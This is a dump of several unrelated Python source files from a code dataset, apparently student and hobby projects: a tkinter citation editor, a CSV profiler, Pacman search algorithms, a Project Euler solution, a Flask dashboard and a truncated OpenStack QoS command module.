23\",fill=rgbString(125,51,35))\r\n Times12 = Radiobutton(command=lambda: \\\r\n chooseFont(canvas,project,\"Times 12\",db),\r\n text=\"Times 12\",variable=v,font=\"Times 12 bold\",\r\n foreground=rgbString(125,51,35),\r\n value=\"Times 12\",bg=rgbString(250,245,205))\r\n canvas.create_window((440,535),window=Times12,anchor=\"nw\")\r\n Cambria11 = Radiobutton(command=lambda: \\\r\n chooseFont(canvas,project,\"Cambria 11\",db),\r\n text=\"Cambria 11\",variable=v,font=\"Cambria 11 bold\",\r\n foreground=rgbString(125,51,35),\r\n value=\"Cambria 11\",bg=rgbString(250,245,205))\r\n canvas.create_window((540,560),window=Cambria11,anchor=\"nw\")\r\n Corbel12 = Radiobutton(command=lambda: \\\r\n chooseFont(canvas,project,\"Corbel 12\",db),\r\n text=\"Corbel 12\",variable=v,font=\"Corbel 12 bold\",\r\n foreground=rgbString(125,51,35),\r\n value=\"Corbel 12\",bg=rgbString(250,245,205))\r\n canvas.create_window((670,560),window=Corbel12,anchor=\"nw\")\r\n Century11 = Radiobutton(command=lambda: \\\r\n chooseFont(canvas,project,\"Century 11\",db),\r\n text=\"Century 11\",variable=v,font=\"Century 11 bold\",\r\n foreground=rgbString(125,51,35),\r\n value=\"Century 11\",bg=rgbString(250,245,205))\r\n canvas.create_window((540,535),window=Century11,anchor=\"nw\")\r\n Calibri12 = Radiobutton(command=lambda: \\\r\n chooseFont(canvas,project,\"Calibri 12\",db),\r\n text=\"Calibri 12\",variable=v,font=\"Calibri 12 bold\",\r\n foreground=rgbString(125,51,35),\r\n value=\"Calibri 12\",bg=rgbString(250,245,205))\r\n canvas.create_window((670,535),window=Calibri12,anchor=\"nw\")\r\n\r\ndef alignRight(canvas,project):\r\n curPos = text.index(INSERT)\r\n startPos = text.index(\"%s.0\" % (curPos[0]))\r\n endPos = text.index(\"%s.end\" % (curPos[0]))\r\n text.tag_configure(\"right\", justify='right')\r\n text.tag_add(\"right\", startPos, endPos)\r\n project.file = text.get(1.0,'end-1c')\r\n\r\ndef alignCenter(canvas,project):\r\n curPos = text.index(INSERT)\r\n startPos = text.index(\"%s.0\" % (curPos[0]))\r\n endPos = text.index(\"%s.end\" % (curPos[0]))\r\n text.tag_configure(\"center\", justify='center')\r\n text.tag_add(\"center\", startPos, endPos)\r\n project.file = text.get(1.0,'end-1c')\r\n\r\ndef alignLeft(canvas,project):\r\n curPos = text.index(INSERT)\r\n startPos = text.index(\"%s.0\" % (curPos[0]))\r\n endPos = text.index(\"%s.end\" % (curPos[0]))\r\n text.tag_configure(\"left\", justify='left')\r\n text.tag_add(\"left\", startPos, endPos)\r\n project.file = text.get(1.0,'end-1c')\r\n\r\ndef createAlignLeftButton(canvas,project):\r\n leftImg=Button(canvas,command=lambda: alignLeft(canvas,project),\r\n borderwidth=0)\r\n anImage = ImageTk.PhotoImage(file=\"imgs\\left.png\")\r\n leftImg.config(image=anImage)\r\n leftImg.image = anImage #Keeping a reference to the image\r\n canvas.create_window((600,100),window=leftImg,anchor=\"nw\")\r\n\r\ndef createAlignCenterButton(canvas,project):\r\n centerImg=Button(canvas,command=lambda: alignCenter(canvas,project),\r\n borderwidth=0)\r\n anImage = ImageTk.PhotoImage(file=\"imgs\\center.png\")\r\n centerImg.config(image=anImage)\r\n centerImg.image = anImage #Keeping a reference to the image\r\n canvas.create_window((630,100),window=centerImg,anchor=\"nw\")\r\n\r\ndef createAlignRightButton(canvas,project):\r\n rightImg=Button(canvas,command=lambda: alignRight(canvas,project),\r\n borderwidth=0)\r\n anImage = ImageTk.PhotoImage(file=\"imgs\\\\right.png\")\r\n rightImg.config(image=anImage)\r\n rightImg.image = anImage #Keeping a reference to the image\r\n canvas.create_window((660,100),window=rightImg,anchor=\"nw\")\r\n\r\ndef boldChar(canvas,project):\r\n start = text.index(SEL_FIRST)\r\n end = text.index(SEL_LAST)\r\n if 'bold' not in project.font:\r\n project.font = project.font + ' ' + 'bold'\r\n else:\r\n begin = project.font.index(\"bold\")\r\n project.font = project.font[:begin] + project.font[begin+5:]\r\n text.tag_configure(\"bold\", font=project.font)\r\n print(start,end)\r\n text.tag_add(\"bold\", start, end)\r\n\r\ndef italicChar(canvas,project):\r\n start = text.index(SEL_FIRST)\r\n end = text.index(SEL_LAST)\r\n if 'italic' not in project.font:\r\n project.font = project.font + ' ' + 'italic'\r\n else:\r\n begin = project.font.index(\"italic\")\r\n project.font = project.font[:begin] + project.font[begin+7:]\r\n text.tag_configure(\"italic\", font=project.font)\r\n text.tag_add(\"italic\", start, end)\r\n\r\ndef underlineChar(canvas,project):\r\n start = text.index(SEL_FIRST)\r\n end = text.index(SEL_LAST)\r\n if 'underline' not in project.font:\r\n project.font = project.font + ' ' + 'underline'\r\n else:\r\n begin = project.font.index(\"underline\")\r\n project.font = project.font[:begin] + project.font[begin+10:]\r\n text.tag_configure(\"underline\", font=project.font)\r\n text.tag_add(\"underline\", start, end)\r\n\r\ndef createBoldButton(canvas,project):\r\n BImg=Button(canvas,command=lambda:boldChar(canvas,project),\r\n borderwidth=0)\r\n anImage = ImageTk.PhotoImage(file=\"imgs\\\\B.png\")\r\n BImg.config(image=anImage)\r\n BImg.image = anImage #Keeping a reference to the image\r\n canvas.create_window((690,100),window=BImg,anchor=\"nw\")\r\n\r\ndef createItalicButton(canvas,project):\r\n IImg=Button(canvas,command=lambda:italicChar(canvas,project),\r\n borderwidth=0)\r\n anImage = ImageTk.PhotoImage(file=\"imgs\\\\I.png\")\r\n IImg.config(image=anImage)\r\n IImg.image = anImage #Keeping a reference to the image\r\n canvas.create_window((720,100),window=IImg,anchor=\"nw\")\r\n\r\ndef createUnderlineButton(canvas,project):\r\n UImg=Button(canvas,command=lambda:underlineChar(canvas,project),\r\n borderwidth=0)\r\n anImage = ImageTk.PhotoImage(file=\"imgs\\\\U.png\")\r\n UImg.config(image=anImage)\r\n UImg.image = anImage #Keeping a reference to the image\r\n canvas.create_window((750,100),window=UImg,anchor=\"nw\")\r\n\r\ndef createTextRegion(canvas,project,db):\r\n createText(canvas,project,db)\r\n createFontMenu(canvas,project,db)\r\n createAlignLeftButton(canvas,project)\r\n createAlignCenterButton(canvas,project)\r\n createAlignRightButton(canvas,project)\r\n createBoldButton(canvas,project)\r\n createItalicButton(canvas,project)\r\n createUnderlineButton(canvas,project)\r\n\r\n#############################################\r\n############# Library Region ################\r\n#############################################\r\n\r\ndef createListbox(canvas,project):\r\n canvas.create_text(810,90,text=\"Library\",\r\n font=\"Impact 23\",anchor=\"nw\",fill=rgbString(125,51,35))\r\n librarySources = Listbox(selectmode=EXTENDED,width=48,height=19)\r\n canvas.create_window((810,130),window=librarySources,anchor=\"nw\")\r\n scroll = Scrollbar(canvas,bg=rgbString(125,51,35))\r\n canvas.create_window((1100,130),window=scroll,height=310,anchor=\"nw\")\r\n deleteB = Button(canvas,\r\n command=lambda:deleteEntry(canvas,project,librarySources),\r\n borderwidth=0)\r\n binImg = ImageTk.PhotoImage(file=\"imgs\\\\bin.png\")\r\n deleteB.config(image=binImg)\r\n deleteB.image = binImg #Keeping a reference to the image\r\n canvas.create_window((1060,97),window=deleteB,anchor=\"nw\")\r\n editB = Button(canvas,\r\n command=lambda:editEntry(canvas,project,librarySources),\r\n borderwidth=0)\r\n penImg = ImageTk.PhotoImage(file=\"imgs\\\\pen.png\")\r\n editB.config(image=penImg)\r\n editB.image = penImg #Keeping a reference to the image\r\n canvas.create_window((1090,97),window=editB,anchor=\"nw\")\r\n intextCiteB = Button(canvas,text=\"Cite in-text\",\r\n command=lambda: putInTextEditor(canvas,project,librarySources),\r\n background=\"white\",borderwidth=0,foreground=rgbString(125,51,35),\r\n padx=6,pady=3,font=\"Impact\")\r\n canvas.create_window((880,450),window=intextCiteB,anchor=\"nw\")\r\n insertBibB = Button(canvas,text=\"Insert bibliography\",\r\n command=lambda: putInTextBib(canvas,project,librarySources),\r\n background=\"white\",borderwidth=0,foreground=rgbString(125,51,35),\r\n padx=6,pady=3,font=\"Impact\")\r\n canvas.create_window((975,450),window=insertBibB,anchor=\"nw\")\r\n index=0\r\n for item in project.library:\r\n librarySources.insert(index+1,item)\r\n index += 1\r\n\r\ndef deleteEntry(canvas,project,librarySources):\r\n try:\r\n move = librarySources.curselection()\r\n project.library.pop(move[0])\r\n createListbox(canvas,project)\r\n except:\r\n pass\r\n\r\ndef editEntry(canvas,project,librarySources):\r\n try:\r\n move = librarySources.curselection()\r\n index = move[0]\r\n editItem = project.library[index]\r\n top = Toplevel()\r\n top.title(\"editEntry\")\r\n v=StringVar(value=editItem)\r\n words = Label(top, text=\"Edit your citation\",font=\"Impact 23\")\r\n words.pack()\r\n editBox = Entry(top,textvariable=v,width=70)\r\n editBox.pack()\r\n saveEditB = Button(top,text=\"Save Edit\",\r\n command=lambda: saveEdit(canvas,project,v,index))\r\n saveEditB.pack()\r\n except:\r\n pass\r\n\r\ndef saveEdit(canvas,project,v,index):\r\n newItem = v.get()\r\n project.library[index] = newItem\r\n createListbox(canvas,project)\r\n\r\ndef putInTextBib(canvas,project,librarySources):\r\n try:\r\n selected = (librarySources.curselection())[0]\r\n selectedSource = project.library[selected]\r\n text.insert(INSERT,selectedSource)\r\n project.file = text.get(1.0,\"end-1c\")\r\n except:\r\n pass\r\n\r\ndef MLAIntext(canvas,selectedSource):\r\n firstPeriodIndex = selectedSource.index(\",\")\r\n authorLast = selectedSource[:firstPeriodIndex]\r\n output = \"(%s page#)\" % authorLast\r\n return output\r\n\r\ndef APAIntext(canvas,selectedSource):\r\n firstPeriodIndex = selectedSource.index(\",\")\r\n authorLast = selectedSource[:firstPeriodIndex]\r\n leftBracket = selectedSource.index(\"(\")\r\n rightBracket = selectedSource.index(\")\")\r\n yearChunk = selectedSource[leftBracket+1:rightBracket]\r\n output = \"(%s, %s, p.page#)\" % (authorLast, yearChunk)\r\n return output\r\n\r\ndef generateInText(canvas,project,selectedSource):\r\n if project.style == \"MLA\":\r\n return MLAIntext(canvas,selectedSource)\r\n elif project.style == \"APA\":\r\n return APAIntext(canvas,selectedSource)\r\n\r\ndef putInTextEditor(canvas,project,librarySources):\r\n try:\r\n selected = (librarySources.curselection())[0]\r\n selectedSource = project.library[selected]\r\n intextCitation = generateInText(canvas,project,selectedSource)\r\n text.insert(INSERT,intextCitation)\r\n project.file = text.get(1.0,\"end-1c\")\r\n except:\r\n pass\r\n\r\ndef createLibraryRegion(canvas,project):\r\n createListbox(canvas,project)\r\n","sub_path":"textLibraryRegion.py","file_name":"textLibraryRegion.py","file_ext":"py","file_size_in_byte":13744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"161490636","text":"from texttable import Texttable\nimport csv\nimport os\n\nall_fields = []\nt = Texttable()\ndata = []\nfiles = []\n\nfor cfile in os.listdir('./csvs'):\n files.append(cfile)\n with open('./csvs/'+cfile, 'r') as csvfile:\n csvreader = csv.reader(csvfile)\n fields = next(csvreader)\n all_fields.append(fields)\n # print('File Name:',cfile)\n # print('Columns Length:',len(fields))\n # print('Columns:',fields)\n # print('_'*80)\n\ndata = [files]\nfor i in range(52):\n temp_list = []\n for j in range(len(files)):\n if i >= len(all_fields[j]):\n x = \"---NONE---\"\n else:\n x = all_fields[j][i]\n temp_list.append(x)\n data.append(temp_list)\n # if all_fields[0][i] != all_fields[2][i]:\n # data.append([all_fields[0][i], all_fields[2][i]])\nt.add_rows(data)\nprint(t.draw())\n","sub_path":"Python-Excel Boilerplates/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"397319102","text":"from site import addsitedir\nimport logging\nfrom json import loads\nimport unittest\naddsitedir(\"..\")\nfrom main import app\n\ndef originalid():\n return \"30d18a08-d6d8-d5d4-f675-8c42c11d6c62\"\n\nclass TestStartStopTestCase(unittest.TestCase):\n def setUp(self):\n app.config[\"TESTING\"] = True\n self.app= app.test_client()\n\n def assertUUID(self, uuid):\n assertEqual(len(uuid), 36)\n assertEqual(uuid.count(\"-\", 4))\n \n def test_controllerstart_jsonok(self):\n response = loads(self.app.get(\"/controller/start/\" + originalid()).data)\n self.assertUUID(response[\"vmid\"])\n assertEqual(response[\"IP\"] == \"172.25.11.90\") \n assertEqual(response[\"HostPort\"] == 5009) \n assertEqual(response[\"VMPort\"] == \"1025\") \n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Test/controllerTest.py","file_name":"controllerTest.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"264584276","text":"\n# ******************************************PROJECT EULER******************************************\n# Problem 10 - Summation of Primes\n# ---------------------------------------PROBLEM DESCRIPTION---------------------------------------\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n# \n# ---------------------------------------SOLUTION EXPLANATION--------------------------------------\n# Solved using the Sieve of Eratosthenes This algorithm operates on an array from 1 to N by \n# \"crossing out\" any element divisible by a prime, starting with 2. After crossing all the elements\n# out for the first prime, the next non-crossed element will be prime, and so on...\n\nN = 2000000 # maximum value\n\n# initialize array of N to all \"prime\"\narray = []\nfor i in range(0, N):\n\tarray.append(True)\n\n# initial prime value (1 is not prime)\nprime = 2\nsum = 0\n\nwhile prime < N:\n\tif array[prime - 1] == True:\n\t\tsum = sum + prime\n\t\t# mark all elements divisible by prime\n\t\tfor i in range(prime - 1, N, prime):\n\t\t\tarray[i] = False\n\t# increment until another prime is found\n\tif prime == 2:\n\t\tprime = prime + 1\n\telse:\n\t\tprime = prime + 2\nprint(sum)","sub_path":"010/euler-010.py","file_name":"euler-010.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"30475434","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print \"Start:\", problem.getStartState()\n print \"Is the start a goal?\", problem.isGoalState(problem.getStartState())\n print \"Start's successors:\", problem.getSuccessors(problem.getStartState())\n \"\"\"\n\n \"*** YOUR CODE HERE ***\"\n rootNode = problem.getStartState() # initialize root node\n route = [] # initialize path to be taken\n frontier = util.Stack() # initialize Stack\n explored = set() # initialize set of visited nodes\n\n frontier.push((rootNode, route)) # push root node and path into the stack\n\n explored.add(rootNode) #add root node to list of explored nodes\n\n while frontier.isEmpty() == False: # while the stack is not empty\n node = frontier.pop() #pop first node from stack\n\n if problem.isGoalState(node[0]):\n return node[1] #Return path if the popped node is the goal state\n\n if node[0] not in explored:\n explored.add(node[0]) #add node to list of explored nodes if it is not present\n\n all_succ = problem.getSuccessors(node[0]) #generate successor nodes\n\n for next_node_data in all_succ: #generate attributes of each successor node\n\n if next_node_data[0] not in explored and frontier: #if node not in the explored list or stack\n path = list(node[1]) #create list of directions\n path.append(next_node_data[1]) #append path taken to list of directions\n frontier.push((next_node_data[0], path)) #push data of the node (i.e. next_node, action) into stack\n\n util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n\n rootNode = problem.getStartState() # initialize root node\n route = [] # initialize path to be taken\n frontier = util.Queue() # initialize Queue\n explored = set() # initialize set of visited nodes\n\n frontier.push((rootNode, route)) # push root node and path into the queue\n\n explored.add(rootNode) # add root node to list of explored nodes\n\n while frontier.isEmpty() == False: # while the queue is not empty\n\n node = frontier.pop() # pop first node from queue\n\n if problem.isGoalState(node[0]):\n return node[1] # Return path if the popped node is the goal state\n\n if node[0] not in explored:\n explored.add(node[0]) # add node to list of explored nodes if it is not present\n\n all_succ = problem.getSuccessors(node[0]) # generate successor nodes\n\n for next_node_data in all_succ: # generate attributes of each successor node\n\n if next_node_data[0] not in explored and frontier: # if node not in the explored list or queue\n path = list(node[1]) # create list of directions\n path.append(next_node_data[1]) # append path taken to list of directions\n frontier.push((next_node_data[0], path)) # push data of the node (i.e. next_node, action) into queue\n explored.add(next_node_data[0]) #add node to list of explored nodes\n\n util.raiseNotDefined()\n\n\n \"\"\"rootNode = problem.getStartState() # initialize root node\n route = [] # initialize path to be taken\n final_route=[]\n frontier = util.Queue() # initialize Queue\n visited = set() # initialize set of visited nodes\n \n frontier.push(rootNode) # push root node and path into the queue\n\n \n while frontier.isEmpty()==False: # while the queue is not empty\n\n node = frontier.pop() # pop first node from queue\n\n if problem.isGoalState(node): #check if node is goal state\n #return route \n return final_route #return route\n #print(node, route) \n\n if node not in visited: #if node is not in the list of visited nodes\n visited.add(node) #add node to list of visited nodes\n\n all_succ = problem.getSuccessors(node) # generate successor node\n\n for next_node_data in all_succ: #obtain attributes of successor nodes\n next_node, next_direction, cost = next_node_data #store the attributes in variables\n\n if next_node not in visited: \n frontier.push(next_node) #If node not is list of visited nodes, add it to the list of visited nodes\n\n if len(final_route)!=0: #troubleshooter to avoid error of popping a empty list\n curr_path = final_route.pop() #pop value from list of directions taken\n final_route.append(curr_path + [next_direction]) \n else:\n final_route.append([])\"\"\"\n\n\n util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n\n from guppy import hpy\n h = hpy()\n\n rootNode = problem.getStartState() # initialize root node\n fringeList = util.PriorityQueue() # initialize priority Queue\n nodes_already_visited = [] # initialize set of visited nodes\n\n # push root node, route and pathcost into the queue\n fringeList.push((rootNode, []), 0) #Push the rootnode, path and priority into the priority queue\n nodes_already_visited.append(rootNode) #add rootnode to list of visited nodes\n\n\n while fringeList.isEmpty() == False: # while the queue is not empty\n\n current_node = fringeList.pop() #pop the first node\n\n if problem.isGoalState(current_node[0]):\n return current_node[1] #if the node is the goal state, return the action performed\n\n if current_node[0] not in nodes_already_visited:\n nodes_already_visited.append(current_node[0]) #if node not present in list of visited nodes, add node to the list of visted nodes\n\n\n all_succ = problem.getSuccessors(current_node[0]) #Generate the successors for the node\n\n for next_node_data in all_succ: #retrieve the attributes for the node\n if next_node_data[0] not in nodes_already_visited or problem.isGoalState(next_node_data[0]):\n path = list(current_node[1])\n path.append(next_node_data[1])\n fringeList.push((next_node_data[0], path), problem.getCostOfActions(path))\n\n print (h.heap())\n\n nodes_already_visited.append(next_node_data[0]) #if node is not in list of visited nodes or is goal state, push the node, action and priority into the queue\n\n util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n # util.raiseNotDefined()\n from game import Directions\n from util import PriorityQueue\n\n from guppy import hpy\n h = hpy()\n\n # to keep track of all the nodes that we have already encountered\n nodes_Already_Seen = []\n ###fringeList = util.Queue()\n fringeList = util.PriorityQueue()\n\n # inserting ((start node, path), priority)\n # items are retrieved based on lowest priority\n fringeList.push((problem.getStartState(), []), 0)\n\n while fringeList.isEmpty() == False:\n current_node_data = fringeList.pop()\n\n if problem.isGoalState(current_node_data[0]):\n return current_node_data[1]\n\n if current_node_data[0] in nodes_Already_Seen:\n continue\n\n nodes_Already_Seen.append(current_node_data[0])\n\n successor_nodes = problem.getSuccessors(current_node_data[0])\n\n for next_node_data in successor_nodes:\n if next_node_data[0] not in nodes_Already_Seen:\n # f = g + h\n final_value = problem.getCostOfActions(list(current_node_data[1]) + [next_node_data[1]]) + heuristic(\n next_node_data[0], problem)\n\n path = list(current_node_data[1])\n path.append(next_node_data[1])\n\n fringeList.push((next_node_data[0], path), final_value)\n\n print(h.heap())\n\n util.raiseNotDefined()\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":11167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357494092","text":"def solution(n, words):\n import collections\n words_dict = collections.defaultdict(bool)\n end_chk = words[0][0]\n for idx, word in enumerate(words):\n if words_dict[word] or word[0] != end_chk:\n return [idx%n + 1, idx//n + 1]\n words_dict[word] = True\n end_chk = word[-1]\n\n return [0, 0]\n\n\nn = 2\nwords = [\"hello\", \"one\", \"even\", \"never\", \"now\", \"world\", \"draw\"]\nprint(solution(n, words))","sub_path":"Programmers/연습문제/Level 2/영어 끝말잇기.py","file_name":"영어 끝말잇기.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425451414","text":"\n\nfrom xai.brain.wordbase.adjectives._sturdy import _STURDY\n\n#calss header\nclass _STURDIEST(_STURDY, ):\n\tdef __init__(self,): \n\t\t_STURDY.__init__(self)\n\t\tself.name = \"STURDIEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"sturdy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_sturdiest.py","file_name":"_sturdiest.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16974606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 7 23:06:03 2020\n\n@author: nicol\n\"\"\"\n\n#useful references:\n#https://blog.miguelgrinberg.com/post/easy-websockets-with-flask-and-gevent\n#https://github.com/miguelgrinberg/Flask-SocketIO\n\nfrom threading import Lock\nfrom flask import Flask, render_template, session, request, \\\n copy_current_request_context, Response, url_for, redirect\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n close_room, rooms, disconnect\nimport random\nimport datetime\nimport sys\nimport analyze_data as adat\nimport time\nfrom ctypes import c_bool\nimport cv2\nimport base64\n\n# Set this variable to \"threading\", \"eventlet\" or \"gevent\" to test the\n# different async modes, or leave it set to None for the application to choose\n# the best option based on installed packages.\nasync_mode = None\n\napp = Flask(__name__)\n#FIXME make this actually secure???\napp.config['SECRET_KEY'] = '403qrwebiup98hsan89-0-j2ojbeqfw08asdmnl23ir'\nsocketio = SocketIO(app, async_mode=async_mode)\nthread = None\nthread_lock = Lock()\n\n#will want to pass the id of the page into the get methods for retrieving data\n\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n # img = None\n while True:\n socketio.sleep(5)\n\n occupants = random.random()\n compliance = random.random()\n avg_dist = random.random()\n dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n fin_img = None\n socketio.emit('update',\n {'occ': occupants, 'comp': compliance, 'dist': avg_dist, 'time': dt, 'image':fin_img},\n namespace='/test')\n\n\n@app.route('/', methods=['GET'])\ndef index():\n locations = ['All', 'Rand', 'MRB3', 'Commons']\n return render_template('fancy_index.html', async_mode=socketio.async_mode , title = \"All\", locations = locations)\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef cam(id1):\n titles = id1\n locations = ['All', 'Rand', 'MRB3', 'Commons']\n if request.method == 'POST':\n # do stuff when the form is submitted\n\n # redirect to end the POST handling\n # the redirect can be to the same route or somewhere else\n return redirect(url_for('index'))\n\n # show the form, it wasn't submitted\n return render_template('fancy_index.html', async_mode=socketio.async_mode , title = titles, locations = locations)\n\n@app.route('/downloads', methods=['GET', 'POST'])\ndef downloads():\n return render_template('downloads.html', async_mode=socketio.async_mode)\n\n\n\n@socketio.on('connect', namespace='/test')\ndef test_connect():\n global thread\n with thread_lock:\n if thread is None:\n thread = socketio.start_background_task(background_thread)\n\n\nif __name__ == '__main__':\n try:\n # app.run(host='192.168.86.245', port=8000, debug=True,\n # use_reloader=False)\n\n # global errs\n # global ocpts\n # global dists\n\n # '10.66.46.173/16'\n socketio.run(app, host='127.0.0.1', port=8000, debug=True,\n use_reloader=False)\n\n\n cv2.destroyAllWindows()\n except:\n print(\"Unexpected error:\", sys.exc_info())\n socketio.stop()\n\n cv2.destroyAllWindows()","sub_path":"unfinished_web.py","file_name":"unfinished_web.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561885643","text":"# Copyright 2015 iWeb Technologies Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Volume v2 QoS action implementations\"\"\"\n\nimport logging\n\nfrom osc_lib.cli import format_columns\nfrom osc_lib.cli import parseractions\nfrom osc_lib.command import command\nfrom osc_lib import exceptions\nfrom osc_lib import utils\n\nfrom openstackclient.i18n import _\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass AssociateQos(command.Command):\n _description = _(\"Associate a QoS specification to a volume type\")\n\n def get_parser(self, prog_name):\n parser = super(AssociateQos, self).get_parser(prog_name)\n parser.add_argument(\n 'qos_spec',\n metavar='',\n help=_('QoS specification to modify (name or ID)'),\n )\n parser.add_argument(\n 'volume_type',\n metavar='',\n help=_('Volume type to associate the QoS (name or ID)'),\n )\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n qos_spec = utils.find_resource(\n volume_client.qos_specs, parsed_args.qos_spec\n )\n volume_type = utils.find_resource(\n volume_client.volume_types, parsed_args.volume_type\n )\n\n volume_client.qos_specs.associate(qos_spec.id, volume_type.id)\n\n\nclass CreateQos(command.ShowOne):\n _description = _(\"Create new QoS specification\")\n\n def get_parser(self, prog_name):\n parser = super(CreateQos, self).get_parser(prog_name)\n parser.add_argument(\n 'name',\n metavar='',\n help=_('New QoS specification name'),\n )\n consumer_choices = ['front-end', 'back-end', 'both']\n parser.add_argument(\n '--consumer',\n metavar='',\n choices=consumer_choices,\n default='both',\n help=(\n _(\n 'Consumer of the QoS. Valid consumers: %s '\n \"(defaults to 'both')\"\n )\n % utils.format_list(consumer_choices)\n ),\n )\n parser.add_argument(\n '--property',\n metavar='',\n action=parseractions.KeyValueAction,\n help=_(\n 'Set a QoS specification property '\n '(repeat option to set multiple properties)'\n ),\n )\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n specs = {}\n specs.update({'consumer': parsed_args.consumer})\n\n if parsed_args.property:\n specs.update(parsed_args.property)\n\n qos_spec = volume_client.qos_specs.create(parsed_args.name, specs)\n\n qos_spec._info.update(\n {\n 'properties': format_columns.DictColumn(\n qos_spec._info.pop('specs')\n )\n }\n )\n return zip(*sorted(qos_spec._info.items()))\n\n\nclass DeleteQos(command.Command):\n _description = _(\"Delete QoS specification\")\n\n def get_parser(self, prog_name):\n parser = super(DeleteQos, self).get_parser(prog_name)\n parser.add_argument(\n 'qos_specs',\n metavar='',\n nargs=\"+\",\n help=_('QoS specification(s) to delete (name or ID)'),\n )\n parser.add_argument(\n '--force',\n action='store_true',\n default=False,\n help=_(\"Allow to delete in-use QoS specification(s)\"),\n )\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n result = 0\n\n for i in parsed_args.qos_specs:\n try:\n qos_spec = utils.find_resource(volume_client.qos_specs, i)\n volume_client.qos_specs.delete(qos_spec.id, parsed_args.force)\n except Exception as e:\n result += 1\n LOG.error(\n _(\n 